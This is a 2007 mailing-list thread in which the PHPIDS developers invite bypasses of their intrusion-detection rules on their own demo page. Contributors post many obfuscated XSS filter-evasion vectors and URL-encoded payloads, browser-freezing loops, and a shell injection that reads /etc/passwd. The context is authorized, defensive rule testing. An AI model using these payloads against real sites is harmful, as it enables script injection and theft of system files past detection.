Pleeeease hack us!

48 views
Skip to first unread message

Mario Heiderich

unread,
Aug 28, 2007, 3:40:43 PM8/28/07
to PHPIDS » Web Application Security 2.0
Hi!

After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spend lots of
time with the rules and except from some details we are pretty content
with them.

So if you like and find some time give them a new try - anyone who
will manage to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's interview will appear the next days - he was
again quicker than light with some vectors mentioned in the release
post).

Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+

Any vector which will be able to create an alert/content change via JS
on the demo page counts - as long as a PoC of what form ever can be
provided. A similar contest will follow the next weeks for SQL
Injection.

Greetings and have fun!
.mario

Giorgio Maone

unread,
Sep 4, 2007, 11:02:01 AM9/4/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 4, 2007, 11:10:02 AM9/4/07
to php...@googlegroups.com
Thanks Giorgio! Very classy ones again. *fixing*




--
_______________________
php-ids.org

Maie...@web.de

unread,
Sep 5, 2007, 3:16:18 PM9/5/07
to PHPIDS » Web Application Security 2.0
Make Giorgios threesome a foursome.
obj[name]() works as well, giving access to all top level functions/
objects.
Low impact in general, but this might be combined with other things...

Mario Heiderich

unread,
Sep 5, 2007, 3:33:55 PM9/5/07
to php...@googlegroups.com
Hi MalerMan and welcome to the group!
Nice variation - I shouldn't have forgotten that ;) *fixed*

Sorry for being late with answers today - I caught a cold and had to dig myself to a project although...

Greetings,
.mario

Gareth

unread,
Sep 6, 2007, 5:03:44 AM9/6/07
to PHPIDS » Web Application Security 2.0
s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':
0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

Told you string concatenation was tough :)

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

Gareth

unread,
Sep 6, 2007, 6:55:43 AM9/6/07
to PHPIDS » Web Application Security 2.0
This will also work with the window.name trick (on IE only onclick):-

URL=name

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

Gareth

unread,
Sep 6, 2007, 10:48:16 AM9/6/07
to PHPIDS » Web Application Security 2.0
Now this is a strange one:-
h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':

0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;

It should work cause I tested it locally however it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
cause the onclick handler to produce invalid data. The code above get
pass your filters though,

Tested this is Firefox locally and it worked:-
<a
onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':


0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':

0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

Mario Heiderich

unread,
Sep 7, 2007, 11:54:39 AM9/7/07
to php...@googlegroups.com
Yep - very nice and strange one indeed! But fixed. The concatenation algorithm has received a recode - hope that will stop the next wave ;)

Greetings and thanks!
.mario

2007/9/6, Gareth <gazh...@gmail.com>:



--
_______________________
php-ids.org

Gareth

unread,
Sep 7, 2007, 12:30:39 PM9/7/07
to PHPIDS » Web Application Security 2.0
Cool Mario nice one, I'll look forward to hacking it again :)

I think I might have found 1 vector already

On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Yep - very nice and strange one indeed! But fixed. The concatenation
> algorithm has received a recode - hope that will stop the next wave ;)
>
> Greetings and thanks!
> .mario
>

> 2007/9/6, Gareth <gazhe...@gmail.com>:

Gareth

unread,
Sep 8, 2007, 6:20:48 AM9/8/07
to PHPIDS » Web Application Security 2.0
s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1

Mario Heiderich

unread,
Sep 8, 2007, 9:58:02 AM9/8/07
to PHPIDS » Web Application Security 2.0
very cool and.. *fixed*

I sent you the questions, gareth. next would be kishor and giorgio if
you guys like to.

Gareth

unread,
Sep 8, 2007, 2:43:37 PM9/8/07
to PHPIDS » Web Application Security 2.0
x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/
+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]+s[10]+c
+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j

On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>

Gareth

unread,
Sep 9, 2007, 2:30:36 PM9/9/07
to PHPIDS » Web Application Security 2.0
c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;
(URL=a);

thornmaker

unread,
Sep 9, 2007, 4:06:14 PM9/9/07
to PHPIDS » Web Application Security 2.0

thornmaker

unread,
Sep 10, 2007, 1:19:22 AM9/10/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 10, 2007, 4:16:17 AM9/10/07
to php...@googlegroups.com
Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for being in the right format to  be executed.

2007/9/10, thornmaker <thorn...@gmail.com >:

Gareth

unread,
Sep 10, 2007, 4:40:26 AM9/10/07
to PHPIDS » Web Application Security 2.0
Hi All

I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is need is because of the amount of possible
combinations and having a automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in you see.

Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip

On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:


>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>

> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...

> --
> _______________________
> php-ids.org

Gareth

unread,
Sep 10, 2007, 7:15:51 AM9/10/07
to PHPIDS » Web Application Security 2.0
Another thing I've thought about is Javascript based XSS protection, I
don't know if this is outside the projects goal but something like
this would prevent window.name exploits:-

<script type="text/javascript">window.name=''</script>

Which the PHPIDS could include in the header of the page.

Mario Heiderich

unread,
Sep 10, 2007, 7:24:54 AM9/10/07
to php...@googlegroups.com
It's a good idea but it's way outside the project - the IDS will provide no protection - just monitoring and information on possible attacks. I had the PHPIPS idea in my head too for some time but there are so many other tools and ways to solve that...

2007/9/10, Gareth <gazh...@gmail.com>:

thornmaker

unread,
Sep 10, 2007, 9:45:43 AM9/10/07
to PHPIDS » Web Application Security 2.0
so here's a similar one but elimates the reg exp's... just pulls the
chars from the ''+/asdf/ directly.
http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

Mario: do you prefer these posted here or at sla.ckers or both?


On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:


>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>

> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...

> --
> _______________________
> php-ids.org

Mario Heiderich

unread,
Sep 10, 2007, 10:03:32 AM9/10/07
to php...@googlegroups.com
Wow - I am impressed again ;) I'd prefer both variants of publishing if you don't mind. Great work, thornmaker!

Greetings,
.mario

2007/9/10, thornmaker < thorn...@gmail.com>:



--
_______________________
php-ids.org
Message has been deleted

xorrer

unread,
Sep 10, 2007, 5:49:47 PM9/10/07
to PHPIDS » Web Application Security 2.0
A few of my findings.

A redirect to google.

http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%3A%6C%65%2E%63%6D%2F%3B%68%3D%78%5B%30%2B%31%5D%3B%74%3D%78%5B%32%2B%31%5D%3B%70%3D%78%5B%34%2B%31%5D%3B%64%3D%78%5B%37%2B%31%5D%3B%73%3D%78%5B%31%2D%31%5D%3B%77%3D%78%5B%31%2B%31%5D%3B%70%31%3D%78%5B%33%2B%31%5D%3B%67%3D%78%5B%35%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6C%3D%78%5B%38%2B%31%5D%3B%65%3D%78%5B%39%2B%31%5D%3B%63%3D%78%5B%31%31%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6D%3D%78%5B%31%32%2B%31%5D%3B%75%3D%68%2B%74%2B%74%2B%70%2B%64%2B%73%2B%73%2B%77%2B%77%2B%77%2B%70%31%2B%67%2B%6F%2B%6F%2B%67%2B%6C%2B%65%2B%70%31%2B%63%2B%6F%2B%6D%2B%73%3B%6E%61%76%69%67%61%74%65%28%75%29%3B

If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediatly closes (close()).

The following two lock up the browser with 100% CPU activity.

http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

This is a opera specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);

On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Wow - I am impressed again ;) I'd prefer both variants of publishing if you
> don't mind. Great work, thornmaker!
>
> Greetings,
> .mario
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:


>
>
>
>
>
>
>
> > so here's a similar one but elimates the reg exp's... just pulls the
> > chars from the ''+/asdf/ directly.
>

> >http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...

Mario Heiderich

unread,
Sep 10, 2007, 6:10:52 PM9/10/07
to PHPIDS » Web Application Security 2.0
Hi xorrer and welcome!

Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?

Needless to say that the rules are *fixed* ;)

Thanks man!
.mario

On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> A few of my findings.
>
> A redirect to google.
>

> http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B


> the site opens and immediatly closes (close()).
>
> The following two lock up the browser with 100% CPU activity.
>

> http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

thornmaker

unread,
Sep 10, 2007, 10:23:24 PM9/10/07
to PHPIDS » Web Application Security 2.0

Andrei Savu

unread,
Sep 11, 2007, 5:03:09 AM9/11/07
to php...@googlegroups.com
All this is simply unbelievable. I am starting to think that this is an endless battle.

As I can see PHP IDS will help to make your website more secure but your
security problems will not end here, you will still need very good input filtering and
output escaping. Personally I don't think this kind of blacklist filtering is the answer
to this security problem.

I think that PHP IDS will give only a fake feeling of security. I am sure that it
will always be possible to find a new attack vector that is not already detected.

I will use PHP IDS because I am sure my scripts are not perfect and somewhere
there is a path that is not protected enough and someday someone will find it. By
using PHP IDS I hope I will limit most of attacks but I still consider that good input
filtering and output escaping is the only real solution.

I am amazed how many ways of injecting javascript in a page are.

--
'Discipline is the bridge between goals and accomplishments.' -Jim Rohn
"Set your goals high, and don't stop till you get there." Bo Jackson

Gareth

unread,
Sep 11, 2007, 6:08:06 AM9/11/07
to PHPIDS » Web Application Security 2.0
Check this one:-
_=alert,1,1,_(1);

Muhahahahahaha

On Sep 10, 11:10 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>

Mario Heiderich

unread,
Sep 11, 2007, 6:21:44 AM9/11/07
to php...@googlegroups.com
Hi Andrej!


"I think that PHP IDS will give only a fake feeling of security. I am sure that it
will always be possible to find a new attack vector that is not already detected."

The PHPIDS shouldn't give you any feeling of security at all - it's no filter and no sanitizing mechanism. Like said on the start page it's able to tell you when someone is trying to attack your site and how he's doing it where. So it's a candy layer which definitely doesn't substitute responsible development. Most people using the PHPIDS use it on high traffic sites to be able to get some figures to ease risk assessment. The feedback we get from the sites using the PHPIDS is great and with any release we can cover more attacks and less false positives.

And yes - there will be no end regarding possible vectors and that's what makes the work with the PHPIDS so exciting.  I think and can speak for myself and others too that working on the PHPIDS is about learning what is possible, understanding XSS, SQL Injection etc. in very detail and widening ones scope what is possible today when talking about webapp security. It's definitely a 2.0 thing too (man I hate that term *g*) because we gather knowledge from people all over the world in this place and everybody who has information or time to contribute is more than welcome ;)

I hope my littler prayer didn't sound to pathetic but I just wanted to make sure what the PHPIDS is and what it's not. And yes - we will continue working on the patterns even if we all know that there will be no resulting software which is 100% bullet proof.


Greetings,
.mario


2007/9/11, Andrei Savu <savu....@gmail.com >:



--
_______________________
php-ids.org
Message has been deleted

xorrer

unread,
Sep 11, 2007, 6:30:40 AM9/11/07
to PHPIDS » Web Application Security 2.0
On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?

Well the only real source I know of is here
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier opera versions jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)

xorrer

On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


> Hi xorrer and welcome!
>
> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?
>
> Needless to say that the rules are *fixed* ;)
>
> Thanks man!
> .mario
>
> On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
>
>
>
> > A few of my findings.
>
> > A redirect to google.
>
> >http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> > If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
> > the site opens and immediatly closes (close()).
>
> > The following two lock up the browser with 100% CPU activity.
>
> >http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
>

Mario Heiderich

unread,
Sep 11, 2007, 7:33:22 AM9/11/07
to php...@googlegroups.com
Thanks xorrer!

@Gareth: This one is evil. damn!

2007/9/11, xorrer <obhvsb...@gmail.com>:



--
_______________________
php-ids.org

Gareth

unread,
Sep 11, 2007, 7:45:58 AM9/11/07
to PHPIDS » Web Application Security 2.0
:)

Dr Evil strikes again muwhahaahaha

I tried to create the smallest possible vector to see if it was
possible, this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.

On Sep 11, 12:33 pm, "Mario Heiderich"


<mario.heider...@googlemail.com> wrote:
> Thanks xorrer!
>
> @Gareth: This one is evil. damn!
>

> 2007/9/11, xorrer <obhvsbypqg...@gmail.com>:


>
>
>
>
>
> > On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
> > wrote:
> > > Nice stuff - I didn't know about the opera specific JS - is there a
> > > link to inform about that stuff?
>
> > Well the only real source I know of is here
> >http://www.howtocreate.co.uk/operaStuff/operaObject.html.
> > And a file once included with earlier opera versions jsconsole.html
> > (http://people.opera.com/byberg/jsconsole.html,

> >http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole...

Mario Heiderich

unread,
Sep 11, 2007, 7:59:05 AM9/11/07
to php...@googlegroups.com
That's indeed DrEvilish - damn - this is working in dozens of combinations...

_=alert, 'a',1;_(1);

_=alert,
1,1;_(1);

_=alert, 1,
1
_(1);

_=alert, 'a',1   ,   _  (1);

Man - it's going to be really hard to find a pattern.

2007/9/11, Gareth <gazh...@gmail.com>:



--
_______________________
php-ids.org

Gareth

unread,
Sep 11, 2007, 8:13:26 AM9/11/07
to PHPIDS » Web Application Security 2.0
Sorry mate :)

It's unbelievable that javascript allows variables to be called just
'_' don't you think lol

I always say building things is a lot harder than breaking them ;)

On Sep 11, 12:59 pm, "Mario Heiderich"


<mario.heider...@googlemail.com> wrote:
> That's indeed DrEvilish - damn - this is working in dozens of
> combinations...
>
> _=alert, 'a',1;_(1);
>
> _=alert,
> 1,1;_(1);
>
> _=alert, 1,
> 1
> _(1);
>
> _=alert, 'a',1 , _ (1);
>
> Man - it's going to be really hard to find a pattern.
>

> 2007/9/11, Gareth <gazhe...@gmail.com>:

thornmaker

unread,
Sep 11, 2007, 9:53:39 PM9/11/07
to PHPIDS » Web Application Security 2.0
I like how the error page shows the vector in an input box now... but
could you make it a bit wider?

Also... I would like to test some of the path traversal injections but
am not for sure what would be considered 'passing'. For example...
http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
passwd in the right context, and you have filters that search for etc
and /etc/passwd outright, so I presume PHPIDS _should_ catch such
things...

thornmaker

unread,
Sep 12, 2007, 3:43:11 AM9/12/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 12, 2007, 4:47:20 PM9/12/07
to PHPIDS » Web Application Security 2.0
@thornmaker: both of your last ones are fixed now. thanks man!

On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...


>
> On Sep 11, 9:53 pm, thornmaker <thornma...@gmail.com> wrote:
>
> > I like how the error page shows the vector in an input box now... but
> > could you make it a bit wider?
>
> > Also... I would like to test some of the path traversal injections but

> > am not for sure what would be considered 'passing'. For example...http://demo.php-ids.org/?test=1;cat%20/e*c/p*dwilldisplay /etc/

thornmaker

unread,
Sep 14, 2007, 12:14:03 AM9/14/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 14, 2007, 4:39:21 AM9/14/07
to php...@googlegroups.com
This is plain awesome - already commented on that one on slackers. Thanks, thornmaker!!!

2007/9/14, thornmaker <thorn...@gmail.com>:



--
_______________________
php-ids.org

thornmaker

unread,
Sep 14, 2007, 9:57:10 AM9/14/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 14, 2007, 11:15:31 AM9/14/07
to php...@googlegroups.com
Yep - I should have put more thought into the rule fixes. Thanks again!

2007/9/14, thornmaker <thorn...@gmail.com>:



--
_______________________
php-ids.org

thornmaker

unread,
Sep 14, 2007, 7:45:15 PM9/14/07
to PHPIDS » Web Application Security 2.0
I was looking at Kishord's new vector and when I submitted (a slight
variation of it) I got this funny error. I can't reproduce it now,
but thought I would mention it. See http://p42.us/php-ids/php-ids-error.png
for a screen shot.

Mario Heiderich

unread,
Sep 14, 2007, 8:05:20 PM9/14/07
to php...@googlegroups.com
Hehe - you managed to catch a 15 second window when i uploaded a faulty file ;)

2007/9/15, thornmaker <thorn...@gmail.com>:



--
_______________________
php-ids.org

thornmaker

unread,
Sep 14, 2007, 10:16:48 PM9/14/07
to PHPIDS » Web Application Security 2.0
Shortly after that, I realized you were working on it live. First the
was blocked by one filter... a few minutes later it was blocked by
two :)

On Sep 14, 8:05 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Hehe - you managed to catch a 15 second window when i uploaded a faulty file
> ;)
>

> 2007/9/15, thornmaker <thornma...@gmail.com>:

thornmaker

unread,
Sep 15, 2007, 12:00:51 AM9/15/07
to PHPIDS » Web Application Security 2.0

xorrer

unread,
Sep 15, 2007, 4:19:51 AM9/15/07
to PHPIDS » Web Application Security 2.0

xorrer

unread,
Sep 15, 2007, 6:05:23 AM9/15/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 15, 2007, 6:15:00 AM9/15/07
to php...@googlegroups.com
Nice one, xorrer! Your first ones i fixed on accident while working on thornmakers and kishors examples but the second one came unexpected ;) I did a slight modification on the converter to fix it. Thx!

2007/9/15, xorrer <obhvsb...@gmail.com>:



--
_______________________
php-ids.org

xorrer

unread,
Sep 15, 2007, 7:56:50 AM9/15/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 15, 2007, 9:34:08 AM9/15/07
to php...@googlegroups.com
Well - I think i got it this time ;)

@xorrer: I'd like to add you to the credits page - you want to be mentioned as xorrer or with your full name? You have a website you want to link your name to?

2007/9/15, xorrer <obhvsb...@gmail.com>:



--
_______________________
php-ids.org

xorrer

unread,
Sep 15, 2007, 11:42:28 AM9/15/07
to PHPIDS » Web Application Security 2.0
@mario

Thanks. You can just list me up as xorrer, no webpage to link to.

On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Well - I think i got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...

xorrer

unread,
Sep 15, 2007, 12:01:10 PM9/15/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 15, 2007, 12:10:36 PM9/15/07
to php...@googlegroups.com
Argh - one second after the release ;)

2007/9/15, xorrer <obhvsb...@gmail.com>:



--
_______________________
php-ids.org

xorrer

unread,
Sep 15, 2007, 12:36:28 PM9/15/07
to PHPIDS » Web Application Security 2.0

Mario Heiderich

unread,
Sep 15, 2007, 12:53:10 PM9/15/07
to php...@googlegroups.com
Well - this issue seems to be way harder to solve than i originally thought.

2007/9/15, xorrer <obhvsb...@gmail.com>:

thornmaker

unread,
Sep 15, 2007, 3:00:39 PM9/15/07
to PHPIDS » Web Application Security 2.0

xorrer

unread,
Sep 15, 2007, 5:31:04 PM9/15/07
to PHPIDS » Web Application Security 2.0
Good stuff thornmaker.

Those ternary ones are though to prevent

I have a vector which fails by just one character. But I would like to
share it anyway.

http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B%61%2B%27%65%76%61%27%2C%5D%3B%63%3D%5B%62%2B%27%6C%27%2C%5D%3B%64%3D%5B%61%2B%27%61%6C%65%72%27%2C%5D%3B%65%3D%5B%64%2B%27%74%28%27%2C%5D%3B%0D%0A%66%3D%5B%65%2B%27%63%25%32%39%27%2C%5D%3B%0D%0A%24%3D%2E%31%5B%63%5D%3B%0D%0A%61%3D%24%3B%0D%0A%61%28%66%29

If you remove the closing bracket. It passes the IDS, but then the
eval won't work.

And with my setup there is no way to escape this regex _START_,.+=.+
(\?|,).*\)_END_ or am I wrong?

On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!

> here's another ternary one to add to the mix:http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...

xorrer

unread,
Sep 15, 2007, 8:44:07 PM9/15/07